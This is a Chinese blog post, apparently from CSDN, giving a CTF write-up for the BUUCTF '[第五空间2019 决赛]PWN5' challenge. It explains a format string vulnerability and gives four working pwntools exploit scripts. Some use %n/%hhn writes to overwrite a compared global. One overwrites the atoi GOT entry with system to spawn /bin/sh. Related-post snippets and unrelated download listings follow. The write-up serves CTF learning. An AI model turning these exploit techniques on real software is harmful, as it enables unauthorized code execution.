字符串格式漏洞-[第五空间2019 决赛]PWN5

原创 于 2025-05-01 22:48:59 发布 · 494 阅读 · 3 ·
CC 4.0 BY-SA版权
加油加油~
文章标签:

#CTF #pwn

之前其实也写了一篇,现在再来看。又有新的收获了,于是记录一下

前置知识

格式化字符串漏洞详解-优快云博客

讲得很清楚,我就不照猫画虎了

实践

main函数

首先先办法泄露我们输入的地址

from pwn import *
elfpath='level0'
# io=process(elfpath)
io=remote("node5.buuoj.cn",29917)
elf=ELF(elfpath)
context(arch=elf.arch,os=elf.os,log_level = "debug")
# shell_addr=0x400596
payload1=b'a'*(0x20+8)+b'\n %x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x'
payload=payload1
io.sendline(payload)
io.interactive()

偏移量10

后面就是exp的编写,难点是去理解exp

exp1:

from pwn import *
sh=remote('node5.buuoj.cn',29917)
payload = p32(0x804c044)+b'%10$n'
sh.sendline(payload)
sh.recv()
sh.sendline(b'4')
sh.interactive()

我们首先把偏移10,改为

我们需要比较的地址

p32(0x804c044)传入地址

+b'%10$n',10$选取偏移第十的地址,传入我们已经传入的字节数(4)

那么现在比对的就是4

我们传入4就可以成功比对成功

exp2

[第五空间2019 决赛]PWN5-优快云博客

看我之前博客的,看来当时也没怎么学懂,哈哈

from pwn import *
sh=remote('node5.buuoj.cn',27574)
payload = p32(0x804c047)+p32(0x804c046)+p32(0x804c045)+p32(0x804c044)+b'%11$hhn%10$hhn%13$hhn%12$hhn'
sh.sendline(payload)
sh.sendline(str(0x10101010))
sh.interactive()

首先,我们把10-14个,放好地址。因为我们刚刚IDA可以看见,比对是个dword

然后我们直接挨着地址,用hhn,指定传入一个字节,

那么内存中就是我们之前16 16 16 16 也就是0x10101010

exp3

BUUCTF - [第五空间2019 决赛]PWN5 - 简书

借鉴博客如上

from pwn import *

p = process('./pwn5')
elf = ELF('./pwn5')

atoi_got = elf.got['atoi']
system_plt = elf.plt['system']

payload=fmtstr_payload(10,{atoi_got:system_plt})

p.sendline(payload)
p.sendline('/bin/sh\x00')

p.interactive()

很清楚的,去拿库函数的got和plt(不懂可以粗俗理解为函数地址,后面再学)

exp4

from pwn import *
#context.log_level = "debug"
p = remote("node3.buuoj.cn",26486)

unk_804C044 = 0x0804C044
payload=fmtstr_payload(10,{unk_804C044:0x1111})
p.sendlineafter("your name:",payload)
p.sendlineafter("your passwd",str(0x1111))
p.interactive()

这个更简单明了~

下班

Buu CTF PWN [第五空间2019 决赛]PWN5 WriteUp
m0sway的博客
03-04 543
Buu CTF PWN第五空间2019 决赛]PWN5的WriteUp
[buuctf][第五空间2019 决赛]PWN5
逆向萌新的博客
06-19 625
[buuctf][第五空间2019 决赛]PWN5
第五空间2019_决赛_PWN5
z1r0的博客
12-04 313
第五空间2019_决赛_PWN5 查看保护 开了canary和NX 23行有一个格式字符串漏洞,测出偏移为10,32位程序的话直接用pwntools的工具fmtstr_payload,没有开pie,所以将unk_804c044这里给覆盖成自己想要的值,然后输入password就可以get_shell。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug =
[第五空间2019 决赛]PWN5
m0_63253040的博客
09-13 479
表中允许进行插入、删除操作的一端称为栈顶。栈顶的当前位置是动态的,对栈顶当前位置的标记称为栈顶指针。栈的插入操作通常称为进栈或入栈,栈的删除操作通常称为退栈或出栈。numbwritten=0, 已经由printf写入的字节数。offset(=None), 第一个格式化程序的偏移量。padlen(=0), payload之前填充的字节数。numbwritten(=0), 已写入的字节数。offset, 第一个格式化程序的偏移量。pwntools – FmtStr类。,是一种只允许在表的一端进行。
buuctf [第五空间2019 决赛]PWN5 writeup
yajuanpi4899的博客
01-16 2215
一、题目速阅 拿到题目,进行check 得到信息,可知开启了金丝雀,32位 IDA进行反编译: 题目分析:该题逻辑是将dword_804C044中值与第二次输入的passwd进行校对,如果相等则执行system("/bin/sh"),确认payload目标:使第二次值相等,而可以看到printf中有格式字符串,根据此构建payload。 二、知识要点 格式字符串漏洞: 利用常用方式检索字符在栈上偏移量: 如图所示,41414141即AAAA,可以看到距离AAAA偏移10位 可..
[第五空间2019 决赛]PWN5 1(格式字符串
Snk0xHeart的博客
04-09 1524
题目没有限制我们的输入,我们就可以利用这个输入%(x/p)等进行测试。
BUUCTF PWN wp--[第五空间2019 决赛]PWN5
2302_81740139的博客
09-01 1121
在这个上下文中,%10$n表示写入的值将是printf的第10个参数,但由于p32(0x804C044)没有在printf调用中作为参数,它实际上利用了格式字符串漏洞,将栈上的某个值写入到地址0x804C044。p32函数将32位整数转换为其小端序的字符串表示,这里转换的是地址0x804C044,这个地址应该是之前提到的全局变量dword_804C044的地址。这个变量似乎是一个全局变量,其地址是硬编码的(例如,在ELF文件中,地址可能是一个固定的地址)。如果之前的利用成功,这将提供一个shell。
BUUCTF--pwn--[第五空间2019 决赛]PWN5格式字符串
qq_73149934的博客
12-10 998
BUUCTF--pwn--[第五空间2019 决赛]PWN5
writeUP-[第五空间2019 决赛]PWN5(待进一步完善待研究内容)-32位格式字符串漏洞原理分析
weixin_52111404的博客
08-02 2752
通过PWN5一题尝试理解格式字符串漏洞
BUUCTF-PWN题详解([第五空间2019 决赛]PWN5
2302_80325559的博客
11-28 1815
今天给大家带来的题用到了和之前不相同的方法,用到了格式字符串
buuctf——[第五空间2019 决赛]PWN51 利用格式字符串
2301_81505831的博客
03-15 742
首先,我们在终端上输入 ./pwn,然后利用AAAA %x %x %x %x %x %x %x %x %x %x %x %x %x的形式来计算偏移量:可以数出0x41414141是格式字符串的第10个参数,之后只要修改dword_804c044的值,让输入和dword_804c044的值一样就可以了。打开靶机,下载文件,检查文件类型,可以看到是32位程序,开启了Canary保护,不能使用栈溢出。放进ida32位可以看到如下代码。最后的最后,附带一些参考博客。用gpt分析以上程序。最后我们便得出了代码。
BUUCTF 第五空间2019 pwn5(格式字符串)
菜的只能随便写写博客
02-02 1130
0x01 文件分析 32位elf 无PIE   0x02 运行  运行文件之后,出现两处输入,一个name和一个passwd,并且name的输入有回显,则有可能是栈漏洞格式字符串。   0x03 IDA查看 IDA F5反汇编之后的代码: int __cdecl main(int a1) { unsigned int v1; // eax int fd; // ST14_4 ...
openoffice editor的源代码
12-14
下载前必看:https://pan.quark.cn/s/5115fbb20cc7 JODConverter - Cli ================== This is the client command line tool module of the Java OpenDocument Converter (JODConverter) project. JODConverter automates conversions between office document formats using LibreOffice or Apache OpenOffice. Licensing -------- Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the Licens...
基于模型预测控制对PMSM进行FOC控制,模拟控制了PMSM的速度(Simulink仿真实现)
12-14
基于模型预测控制对PMSM进行FOC控制,模拟控制了PMSM的速度(Simulink仿真实现)内容概要:本文介绍了基于模型预测控制(MPC)对永磁同步电机(PMSM)进行磁场定向控制(FOC),并通过Simulink仿真平台实现了对PMSM转速的精确控制。文中详细构建了PMSM的数学模型,设计了MPC控制器,并将其与传统的FOC策略相结合,以提升系统的动态响应性能与鲁棒性。仿真结果验证了该控制方法在速度调节、抗干扰能力及电流控制精度方面的有效性,展示了其在高性能电机驱动系统中的应用潜力。; 适合人群:具备电机控制理论基础和Simulink仿真经验,从事电气工程、自动化或相关领域研究的研究生、科研人员及工程技术人员。; 使用场景及目标:①用于高性能电机控制系统的设计与仿真研究;②为PMSM控制算法的优化提供技术参考,特别是在需要快速响应和高精度控制的应用场合,如电动汽车、工业伺服系统等;③帮助理解MPC与FOC融合控制的实现机制与优势。; 阅读建议:建议结合Simulink模型同步操作,深入理解MPC控制器的设计步骤与参数整定方法,并可通过修改负载条件或参考转速进一步测试系统鲁棒性,强化理论与实践的结合。
网络工程基于SecureCRT的Python自动化脚本开发:毕业设计中多设备配置验证与日志采集系统实现
12-14
内容概要:本文围绕SecureCRT自动化脚本开发在毕业设计中的应用,系统介绍了如何利用SecureCRT的脚本功能(支持Python、VBScript等)提升计算机、网络工程等相关专业毕业设计的效率与质量。文章从关键概念入手,阐明了SecureCRT脚本的核心对象(如crt、Screen、Session)及其在解决多设备调试、重复操作、跨场景验证等毕业设计常见痛点中的价值。通过三个典型应用场景——网络设备配置一致性验证、嵌入式系统稳定性测试、云平台CLI兼容性测试,展示了脚本的实际赋能效果,并以Python实现的交换机端口安全配置验证脚本为例,深入解析了会话管理、屏幕同步、输出解析、异常处理和结果导出等关键技术细节。最后展望了低代码化、AI辅助调试和云边协同等未来发展趋势。; 适合人群:计算机、网络工程、物联网、云计算等相关专业,具备一定编程基础(尤其是Python)的本科或研究生毕业生,以及需要进行设备自动化操作的科研人员; 使用场景及目标:①实现批量网络设备配置的自动验证与报告生成;②长时间自动化采集嵌入式系统串口数据;③批量执行云平台CLI命令并分析兼容性差异;目标是提升毕业设计的操作效率、增强实验可复现性与数据严谨性; 阅读建议:建议读者结合自身毕业设计课题,参考文中代码案例进行本地实践,重点关注异常处理机制与正则表达式的适配,并注意敏感信息(如密码)的加密管理,同时可探索将脚本与外部工具(如Excel、数据库)集成以增强结果分析能力。
基于微信小程序的周边美食推荐系统_2axo8_springboot2axo8数据库文档.doc
12-14
基于微信小程序的周边美食推荐系统_2axo8_springboot2axo8数据库文档
snake-right.png
12-14
snake-right.png
预测分析-航班延误_readme.md
最新发布
12-14
探索飞机航班信息与延误之间的关系
安卓导航HW8227系统固件+MCU+使用说明教程
12-14
安卓导航HW8227系统固件+MCU+使用说明教程 将SD8227刷机包 里的文件复制到U盘根目录,插上车机,在系统设置里的系统信息里,点Android升级 进行刷机,重启自动进入刷机界面。刷机完毕,需要如需要修改协议,在工厂模式(密码一般是8888)下修改协议,选择对应的车型,就可以匹配方向盘,如果不行,多试几次,大众的协议就好多个 升级完成以后,可以自行安装想要的app,车机系统不带商店,不带导航,导航也需要通过U盘安装,带文件管理,没有多余的应用。安装app需要电脑下载以后,用U盘进行安装
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

name_name123

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值